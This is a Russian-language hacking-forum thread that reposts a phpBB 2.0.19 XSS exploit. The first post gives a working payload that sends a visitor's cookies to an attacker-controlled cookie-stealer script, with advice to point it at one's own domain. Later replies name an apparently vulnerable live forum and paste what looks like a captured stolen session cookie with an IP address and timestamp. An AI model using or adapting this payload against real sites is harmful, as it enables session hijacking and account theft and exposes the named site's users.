HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
  #1  
Старый 31.01.2006, 13:55
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
С нами: 10991846

Репутация: 2054


По умолчанию phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cook ie' b='<pre' >

[урл]http://www.somesite.com/[/урл]</pre>

"урл" пишем английскими буквами - url

Источник: _http://ivdb.org/poc/1236.htm
𝕏 Twitter Reddit Telegram Копировать ссылку
__________________
Лучший способ защиты - это нападение!!!
Последний раз редактировалось TANZWUT; 31.01.2006 в 14:38..
 
Ответить с цитированием

  #2  
Старый 31.01.2006, 17:43
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
С нами: 10782887

Репутация: 43
По умолчанию
Это из тех что только при включенном HTML работают? As long as html is ON in the latest version of phpBB forums... Что он имеет ввиду?
 
Ответить с цитированием

  #3  
Старый 31.01.2006, 18:16
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами: 11272646

Репутация: 1384


По умолчанию
Проблема в том, что на форуме должен быть включен Html, а он по умолчанию выключен и я еще не встречал форумов где он разрешен, так что...
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

  #4  
Старый 10.06.2008, 20:15
xpi100
Новичок
Регистрация: 06.12.2007
Сообщений: 2
С нами: 9699952

Репутация: 0
По умолчанию
html on bbcode on
http://contacti-bg.free.bg/cgi-php/phpbb2
 
Ответить с цитированием

  #5  
Старый 10.06.2008, 20:18
xpi100
Новичок
Регистрация: 06.12.2007
Сообщений: 2
С нами: 9699952

Репутация: 0
По умолчанию
Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3 A-1%3B%7D;%20phpbb2mysql_sid=5a07a75738cf88a448b65db d45a5d1d6;%20__utma=85799179.2542689321017482000.1 212853877.1212853877.1212853877.1;%20__utmb=857991 79;%20__utmc=85799179;%20__utmz=85799179.121285387 7.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none );%20phpbb2mysql_t=a%3A2%3A%7Bi%3A22%3Bi%3A1213117 583%3Bi%3A23%3Bi%3A1213118622%3B%7D<br> IP: 89.215.251.63<br> Date and Time: 10 June, 2008, 12:16 pm<br> Referer: <br><br><br>
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Уязвимости CMS / форумов 6 26.10.2006 21:30
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45
phpBB <= 2.0.18 Remote Dictionary Attack Tool D1mOn Уязвимости CMS / форумов 5 31.01.2006 19:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.